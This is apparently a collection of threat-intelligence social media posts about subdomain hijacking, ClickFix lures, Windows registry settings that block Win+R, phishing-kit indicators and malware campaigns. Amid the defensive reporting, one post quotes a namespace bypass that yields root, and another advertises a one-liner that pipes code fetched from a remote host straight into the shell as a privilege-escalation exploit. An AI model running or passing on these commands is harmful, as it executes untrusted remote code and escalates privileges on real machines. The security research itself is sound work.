Our latest blog is out! It covers a rising issue that many major organization experiences: Subdomain hijacking through abandoned cloud resources.

This research follows our reporting from earlier in the year about the CDC subdomain hijack. We initially assumed that this was an isolated incident. Well… We were wrong.

We tied some of this activity to a threat actor, dubbed Hazy Hawk, who hijacks high-profile subdomains which they use to conduct large-scale scams and malware distribution.

https://blogs.infoblox.com/threat-intelligence/cloudy-with-a-chance-of-hijacking-forgotten-dns-records-enable-scam-actor/

#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #HazyHawk

I think I have a nice compromise #ClickFix ...fix for those places that just can't live without some Explorer niceties.

There is an alternative to the "Disable Windows shortcuts" GPO, which not only disables Win+ shortcuts, but also things like using UNC paths in the Explorer address bar.

Of course, Geoff Chappell lights the way.

I believe that GPO applies the REST_NORUN reg key and not REST_NOWINKEYS policies—despite the name.

If I apply the REST_NORUN reg setting directly, I get the same behavior as the GPO. The popup pictured here appears.

But if I instead set the REST_NOWINKEYS dialog, the Win+R shortcut is disabled, but other stuff (like UNC paths in explorer) still works! Now, this doesn't remove the Run command from the start menu, but it is at least a safety. Oh and one more thing: because that shortcut is now unregistered, you can register it yourself for something like a lil daemon that pops a message box saying Hey did a website tell you to do this? Don't!

You can try both settings.

REST_NORUN: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

REST_NOWINKEYS: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys

UPDATE: You can additionally disable only Win+R by setting HKEY_CURRENT_USER\SOFTWARE\Microsoft\CurrentVersion\Explorer\Advanced\DisabledHotkeys to a String value containing the Win shortcuts you want to disable. So a single R will do the trick. Note this only works at the user level.

So, I asked GPT to help me deofuscate this VBS script, and now I'm wondering if it's just fucking with me, or if I can never trust AI ever again.

@deepthoughts10 @saltmyhash hey! i got that one to come up. did use salt's tip with using an Android UA. within the CSS was a comment in Chinese, so this appears to align with Kreb's article.

@deepthoughts10 actually haven't. i do see our folks going to them and have event gotten one or two myself.

looks like the URL you sent is already dead. no fun!

@threatcat_ch ah hah! sure enough, i just needed to scroll down. sheesh, sloppy code! smh

thank you for pointing that out!

@threatcat_ch hmm, i'm still seeing the mshta method

One less fake browser update campaign. Not to be left out, #SmartApeSG has switched to the #ClickFix technique.

@crep1x i don't see a direct common artifact from the IOCs shared, but this looks just like #KongTuke

Looking at https://www.qualys.com/2025/three-bypasses-of-Ubuntu-unprivileged-user-namespace-restrictions.txt:

$ aa-exec -p trinity -- unshare -U -r -m /bin/bash
# id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

(It's time to learn about namespaces =))

#linux, #threatintel

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL https://thc.org/7350pipe)”

@knitcode sorry to hear that. I'll think kind thoughts for you.

Sophos MDR has observed two distinct social engineering campaigns using a technique referred to as ClickFix spiking during March. In both of these campaigns—one surging on March 2 and the other on March 12—the goal was deployment of SecTopRAT malware. We are tracking this activity as STAC6380. /1

Tycoon 2FA (a prominent AitM phishing kit), targeting Microsoft and Google accounts, uses a new CAPTCHA page instead of the custom Cloudflare Turnstile page

e.g.
hxxps://ymi.bvyunz.]ru/3v4jfQ-cUo/
hxxps://xau.kolivax.]ru/ckYHFJN/
hxxps://ffqt.lzirleg.]es/VajlR/

Current decoy pages used since 18 March, changing every 3/4 weeks since the beginning of 2025:

https://urlscan.io/search/#page.title%3A(%22Portfolio%20%26%20Agency%20-%20Modern%20Design%22%20OR%20%22EduVision%20-%20Transforming%20Education%22%20OR%20%22Tech%20Solutions%20-%20Innovating%20the%20Future%22)

@dangoodin be sure to opt out of their AI training. There's no handy button. Admin must send an email request.

@sekoia_io published a nice blog post about BSC (Binance Smart Chain) https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
@threatcat_ch is tracking BSC as well, and we share our gained information on Threatfox/MalwareBazaar @abuse_ch As a side note, most of the delivered payloads led to Rhadamantys (https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys) instead of Lumma in the last few days.

@briankrebs funny you should post yesterday about #ClickFix . I blogged the day prior about a supply chain attack that presented that very threat. It's been a very popular technique with the TA's, many of which have switched from fake browser updates to it. And I can state that folks do fall for it.

https://rmceoin.github.io/malware-analysis/2025/03/13/supply-chain.html

Stumbled into a supply chain attack yesterday affecting over 100 auto dealerships. The third party was informed and has remediated.

https://rmceoin.github.io/malware-analysis/2025/03/13/supply-chain.html

#ClickFix

Stumbled into a supply chain attack yesterday affecting over 100 auto dealerships. The third party was informed and has remediated.

https://rmceoin.github.io/malware-analysis/2025/03/13/supply-chain.html

#ClickFix

@knitcode @gentleshep FYI, there is a DGA being used by Apollo you might be interested in. It's email related, I just haven't seen the emails yet.

The format is t for subdomain, then apex domain has two words separated by a hyphen.

See this listing from @nopatience as well has this thread in general.

https://docs.proton.me/doc?mode=open-url&token=5ETC9EQFWG#IMnkXeZmFmu5